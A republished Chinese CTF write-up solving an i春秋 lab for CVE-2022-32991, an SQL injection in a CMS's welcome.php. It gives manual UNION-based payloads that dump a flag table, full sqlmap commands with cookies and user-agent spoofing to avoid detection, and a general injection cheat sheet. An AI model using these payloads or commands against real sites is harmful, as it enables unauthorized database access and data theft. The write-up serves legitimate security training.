春秋云境:CVE-2022-32991(SQL注入)

这篇具有很好参考价值的文章主要介绍了春秋云境:CVE-2022-32991(SQL注入)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一.i春秋

 二.手工注入

三.sqlmap注入

1.sqlmap注入---文件.txt

2.sqlmap--参数

附:sql注入命令


一.i春秋

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

靶标介绍:

该CMS的welcome.php中存在SQL注入攻击。

打开是一个登录注册页面:

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 点击登录:url看着也没有sql注入

随意输入邮箱和密码:

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 并用bp抓包

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 回显用户名或者密码错误:

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php考虑到要找welcome.php,应该是一个登录进去的页面,爆破登录太慢,有随机性。

就从注册页面入手吧:

进入注册页面:

用户密码随意输入就可:

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 登录我们刚刚注册的用户:

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

成功登录,进入welcome.php页面: 

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

q=2 

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php q=3

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

当q=4时:是没有页面的

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 经过简单的测试,发现home下的start可以跳转:

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 查看一下url:

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 发现submit每点击一次,url的n的值就会加1:

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 测试url的 n=2' 发现有sql注入:

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 二.手工注入

 测试注入点:

n=2' union select 1,2,3,4,5--+

http://eci-2zedx8v26d3xirugdhkx.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=2%27%20union%20select%201,2,3,4,5--+&t=34

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

查询当前数据库名称:

n=2' union select 1,2,database(),4,5--+

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

查询数据库位置:

n=2' union select 1,2,@@datadir,4,5--+

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 查询数据库表

2' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='ctf'--+

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 查看flag表中的字段:

2' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema='ctf' and table_name='flag'--+
i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

查询字段flag

 2' union select 1,2,group_concat(flag),4,5 from flag--+

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

flag值 :

 flag{159e51b2-cdb2-4db2-a59f-5c5c1971216d}

以下是sqlmap工具跑出来的,容器是一个新的,所以flag不一样。

三.sqlmap注入

 测试并burp抓包:

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

这时我们可以用两种方法解题:

 都是用到sqlmap的

 Sqlmap基本参数:

--u                             #指定要测试的目标url
--p                             #指定sqlmap注入的传参参数
--cookie                        #绕过身份验证
--random-agent或--user-agent    #绕过客户端验证
--batch                         #默认后续sqlmap操作都为Y
--dbs                           #爆破所有数据库(databases缩写)

1.sqlmap注入---文件.txt

 把抓包的内容写入txt中:

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 爆库:

python sqlmap.py -l C:\Users\cheng\Desktop\1.txt --batch -dbs

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 爆出来数据库:

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 爆表

python sqlmap.py -l C:\Users\cheng\Desktop\1.txt --batch -D "ctf" --tables

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 爆出来的表:

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 爆列:

python sqlmap.py -l C:\Users\cheng\Desktop\1.txt --batch -D "ctf" -T "flag" --columns

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

爆字段:

python sqlmap.py -l C:\Users\cheng\Desktop\1.txt --batch -D "ctf" -T "flag" -C "flag" --dump

 i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

得出来flag:

flag{d08e9fb8-9a7e-4827-b478-a32665656c8e}

 

2.sqlmap--参数

        该页面采用了登录访问,所以首先想到要使用–cookie参数使得sqlmap绕过身份验证,并添加–user-agent参数或–random-agent使得sqlmap绕过客户端验证,否则可能会被识别到明显的sqlmap客户端标识,从而导致攻击的中断。

-u 的url

 -u "http://eci-2ze1e3vw3lo1qejbppsf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=7&t=10"

-p 的参数 

 -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"

--cookie 设置cookie值 

--cookie="ci_session=b46e9bd88b56429f4211f41daad049b50003af24; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1681218038; PHPSESSID=th97u64vl5evkho1etki7jucnu; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1681219668"

自动确认y 和 爆库

--batch --dbs

 完整的:

虽然有点多,但也就是复制粘贴的事~

python sqlmap.py -u "http://eci-2ze1e3vw3lo1qejbppsf.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=7&t=10" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" --cookie="ci_session=b46e9bd88b56429f4211f41daad049b50003af24; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1681218038; PHPSESSID=th97u64vl5evkho1etki7jucnu; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1681219668" --batch --dbs

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

 爆表:

python sqlmap.py -u "" -p "eid" --user-agent="" --cookie="" --batch -D "ctf" --tables

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

爆列:

python sqlmap.py -u "" -p "eid" --user-agent="" --cookie=""  --batch -D "ctf" -T "flag" --columns

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

爆字段:

python sqlmap.py -u "" -p "eid" --user-agent="" --cookie=""  --batch -D "ctf" -T "flag" -C "flag" --dump

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

i春秋 sql注入,i春秋,sql,数据库,web安全,安全,php

附:sql注入命令

1.可能出现asp?id=x的网站

  只能是基于asp、PHP、jsp、aspx的动态网站,并且存在数据库交互,例:登陆、留言板、搜索、新闻。但是静态页面不可以,如html、htm。

2.漏洞测试

  (1)单引号测试:在页面中执行命令时使用成对单引号和单个单引号进行测试,查看是否有SQL注入;

  (2)利用条件语句测试:利用SQL连接选项‘and’连接URL,把1=1和1=2作为条件同样连接进去,如果条件不成立数据库就会发生变化,代表存在注入,同时也可以判断数据库的类型。

3.Acess数据库注入(手动)

  (1)使用‘and’语句来判断是否存在注入;

  (2)判断数据库类型;

    and (select count(*) from msysobjects)>0;返回权限不足是access表,反之则MSSQL。

  (3)查看数据库名;

    and db_name()>0

    (4)查看版本信息;

    and 0<>(select @@version)

  (5)查看数据库中是否存在admin这个管理表;

    and exists(select * from [admin])

    and (select count(*) from admin)>0

  (6)查看admin这个表中是否有username这个管理列;

    and exists(select top 1 [username] from [admin])

    and (select username from admin)>0

  (7)猜测admin这个管理列中用户名的长度;

    and (select top 1 len(username) from admin)>0

    后面的长度随意猜测,选择最大返回正常值加1作为长度。

    (8)取出username的ASCII码值;

    and (select top 1 asc(mid(username,N,1)) from admin)>0

    mid()函数用来截取,N为第几位,‘1’代表几位数;得到的结果可用工具小葵进行转换,得到的便是真实值。

4.MySQL数据库注入(手动)

  (1)判断注入点,后面加#,返回正常则为MySQL数据库;

  (2)判断字段数;

    orderb by 1--

    数字可以不断的加,当返回值改变时,则为全部字段数+1;得到字段数来判断能回显数据的位置

  (3)联合查询,判断可回显数据的位置;

    union select 1,2,3...(上一个得到的字段数)--

    要在URL中加入一个错误的判断值(and 1=2 或在数值前加‘-’号)页面才会显示能够显示数据的位置。

  (4)查看用户,版本,库名

    user(),version(),database()

  (5)查看管理表(常见的管理表命名方式:system、login、admin、users)

    union select 1,table_name(此处为可显示数据的位置),3,...(字段数) from Information_schema.tables where table_schema=(此处为库名的16进制数) limit 0,1--

  (6)查看列

    union select 1,column_name,3,..., from Information_schema.column where table_name=(表名16进制) limit 0,1--

5.sqlmap

  (1)需要在python环境下运行;

  (2)测试是否为注入点;

    sqlmap.py -u "URL"

  (3)获取数据列表;

    sqlmap.py -u "URL" --dbs

  (4)当前数据库;

    sqlmap.py -u "URL" --current-db

  (5)获取数据库所有表信息;

    sqlmap.py -u "URL" --tables -D "目标数据库"

  (6)获取列;

    sqlmap.py -u "URL" --column -T "管理表" -D “目标数据库”

  (7)获取字段;

    sqlmap.py -u "URL" --dump -C "字段" -T “管理表” -D “目标数据库”文章来源地址https://www.toymoban.com/news/detail-736590.html

到了这里,关于春秋云境:CVE-2022-32991(SQL注入)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 春秋云镜cve-2022-32991wp

    首先看靶标介绍:该CMS的welcome.php中存在SQL注入攻击 访问此场景,为登录界面,可注册,注册并登陆后找可能存在sql注入的参数,尝试在各个参数后若加一个单引号报错,加两个单引号不报错,说明此参数可能存在sql注入,经过尝试在 http://xxx.ichunqiu.com/welcome.php?q=quizstep=2ei

    2024年02月12日
    浏览(59)
  • 【春秋云境】CVE-2022-30887

    标靶介绍: 多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任

    2024年02月16日
    浏览(39)
  • 春秋云境:CVE-2022-28060

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Victor CMS v1.0 /includes/login.php 存在sql注入 解题步骤 访问URL,在登录过程中抓包: 探测存在SQL注入: 1\\\'+AND+(SELECT*FROM+(SELECT+SLEEP(5))a)+AND+\\\'1\\\'=\\\' 使用Sqlmap获取flag,通过–sql-shell再传入load_file进行文件读取: 文章合集 :春秋云境

    2024年02月12日
    浏览(69)
  • 春秋云境:CVE-2022-24124

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。 解题步骤 题外话 这个题

    2024年02月01日
    浏览(40)
  • 春秋云境:CVE-2022-26965

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Pluck-CMS-Pluck-4.7.16 后台RCE 解题步骤 过弱口令登录:admin 登录之后按照图中位置进行主题安装 按照这位大哥文章: https://blog.csdn.net/weixin_39639260/article/details/116105945 中说的,需要将主题中的info.php文件修改,再打包成zip再上

    2024年02月04日
    浏览(52)
  • 春秋云境:CVE-2022-24112

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于

    2024年02月06日
    浏览(42)
  • 春秋云境:CVE-2022-28525

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 ED01-CMS v20180505 存在任意文件上传漏洞 解题步骤 访问URL 通过弱口令进行登录:admin/admin 登录后在图中位置点击进行图片更新,需要将密码等都写上 抓包将图片信息进行替换,并修改文件名 上传成功后访问上传的shell并执

    2024年02月11日
    浏览(56)
  • 春秋云境:CVE-2022-25401(任意文件读取漏洞)

    一、题目 二、curl访问flag文件 介绍:         Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞  进入题目 是一个登录页面 sql和暴破都无解。 官方POC  国家信息安全漏洞库 cve漏洞介绍 官方给错了目录 没有administrator/ 找不到 官方poc  代码块

    2024年02月10日
    浏览(42)
  • 春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞)

    一、i春秋题目 二、CVE-2022-0543:(redis沙盒逃逸) 漏洞介绍: 漏洞复现: 靶标介绍: Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。 进入题目:  SSRF漏洞: 后面加上题目给定的网站试试:  可以跳转到百度页面:  读取系统文件:IP/?url=file:///etc/passwd  获取

    2024年02月11日
    浏览(40)
  • 春秋云境:CVE-2022-29464(WSO2文件上传漏洞)

    一、题目 二、burp改包   进入题目: 是一个登录页面   这题确实没什么思路,所以看了官方POC: 因为这个漏洞已经被国家cnnvd收入了 burp抓包:不需要登录,刷新即可。  发送到重放器:根据官方POC更改即可: 这两个参数需要用本机抓包的:  如图: 在次访问登录网站,

    2024年02月08日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包